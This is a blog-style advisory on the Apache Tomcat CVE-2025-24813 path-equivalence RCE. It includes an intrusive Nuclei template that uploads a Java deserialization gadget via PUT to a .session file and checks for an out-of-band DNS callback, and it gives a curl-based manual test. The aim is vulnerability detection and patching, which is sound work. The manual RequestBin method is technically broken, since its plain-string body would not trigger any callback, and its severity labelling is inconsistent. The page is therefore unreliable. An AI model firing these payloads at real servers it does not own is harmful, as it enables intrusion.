Advisory

CVE-2025-24813 PoC: Apache Tomcat Path Equivalence RCE – Risks, Nuclei Check, and RequestBin Test

CVE-2025-24813 PoC exposes Apache Tomcat to RCE. Test with Nuclei YAML or RequestBin, fix with our guide. Protect your apps from this exploit now!

Jackson

Jackson

4 min read
CVE-2025-24813 PoC: Apache Tomcat Path Equivalence RCE – Risks, Nuclei Check, and RequestBin Test

1. Introduction: A Critical Apache Tomcat PoC

Apache Tomcat faces a high-severity threat with CVE-2025-24813, a path equivalence vulnerability leading to remote code execution (RCE). Discovered in 2025, this flaw in the Default Servlet is a goldmine for attackers—and a headache for developers. In this post, we’ll explore the risks, share a PoC YAML rule, and show you how to test it with Nuclei and RequestBin.

CVE-2025-24813 PoC puts your Tomcat apps at risk

2. What is CVE-2025-24813?

CVE-2025-24813 exploits a path equivalence bug where filenames with internal dots (e.g., file.Name) trick Tomcat’s Default Servlet. If write access is enabled, attackers can:

  • Execute Code Remotely: Upload malicious payloads for RCE.
  • Steal Data: Expose sensitive files.
  • Inject Malware: Add harmful content to uploads.

With a CVSS score of 5.5 (AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L), it’s rated "high" severity. It’s network-accessible, low-complexity, and a prime target for PoC exploits. Check Scrapco’s analysis for a deep dive.

3. Why Developers Should Worry

Running Tomcat below versions 11.0.3, 10.1.35, or 9.0.98? This PoC vulnerability could:

  • Compromise your app, leaking user data.
  • Let attackers run commands, turning servers into attack hubs.
  • Trigger costly breaches or ransomware.

The Nuclei PoC below proves how easy it is to test—and exploit.

CVE-2025-24813 PoC could let hackers hijack your Tomcat server

4. Testing CVE-2025-24813: Nuclei PoC and RequestBin

You can verify this vulnerability with two methods: Nuclei (using the YAML rule) or RequestBin (manual PoC). Here’s how.

Method 1: Nuclei PoC Check

Nuclei is a fast, open-source vuln scanner. Use this YAML rule to detect CVE-2025-24813:

More details at https://nuclei-templates.com/vulnerability/http/cves/2025/cve-2025-24813/

id: CVE-2025-24813

info:
  name: Apache Tomcat Path Equivalence - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Path Equivalence- 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat.
  remediation: |
    Users are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.98, which fixes the issue.
  reference:
    - https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html
    - https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq
    - http://www.openwall.com/lists/oss-security/2025/03/10/5
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24813
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L
    cvss-score: 5.5
    cve-id: CVE-2025-24813
    cwe-id: CWE-502
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2025,apache,tomcat,rce,intrusive

variables:
  filename: "{{randbase(6)}}"

http:
  - raw:
      - |
        PUT /{{filename}}.session HTTP/1.1
        Host: {{Hostname}}
        Content-range: bytes 0-452/457

        {{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}}
      - |
        PUT /{{filename}}.session HTTP/1.1
        Host: {{Hostname}}
        Content-range: bytes 0-452/457

        {{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}}
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
      - type: status
        status:
          - 204
          - 201

Use Nuclei

  1. Install Nuclei: Download from GitHub and install (e.g., go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest).
  2. Save the YAML: Copy the rule into a file, e.g., cve-2025-24813.yaml.
  3. Run the Scan:
nuclei -u http://your-tomcat-server.com -t cve-2025-24813.yaml -interactsh
    • -u: Target URL.
    • -t: Template file.
    • -interactsh: Uses Nuclei’s built-in Interactsh server for DNS callbacks.
  • Check Results:If Nuclei reports a match (DNS callback + 201/204 status), your server is vulnerable.No match? You’re likely safe, but confirm your version.
Running Nuclei to test CVE-2025-24813 PoC on your Tomcat server.

Method 2: RequestBin Manual PoC

RequestBin offers a simpler, manual test:

  1. Navigate to RequestBin.net. Click the "Get RequestBin" button.
  2. Copy the unique URL provided (e.g., https://<id>.oast.pro) and Craft the PoC Request:
PUT /test123.session HTTP/1.1
Host: your-tomcat-server.com
Content-range: bytes 0-452/457

dns://<id>.oast.pro
  1. Send It: Use curl:
curl -X PUT -H "Host: your-tomcat-server.com" -H "Content-range: bytes 0-452/457" -d "dns://<id>.oast.pro" http://your-tomcat-server.com/test123.session
  • Repeat the request twice.
  1. Verify:
  • RequestBin logs the request + curl shows 201/204? Vulnerable.
  • No log or error (e.g., 403)? Likely safe.

5. Fixing CVE-2025-24813

If your PoC tests confirm vulnerability:

  • Upgrade Now: Install Tomcat 11.0.3, 10.1.35, or 9.0.98 (Apache thread).
  • Restrict Write Access: Disable Default Servlet writes if upgrading isn’t immediate.
  • Monitor Traffic: Look for unusual PUT requests to .session files.

6. Conclusion

CVE-2025-24813 is a potent RCE risk for Tomcat users. With our Nuclei PoC and RequestBin guide, you can test your servers fast. Upgrade, secure, and stay proactive—your apps deserve it!

Read more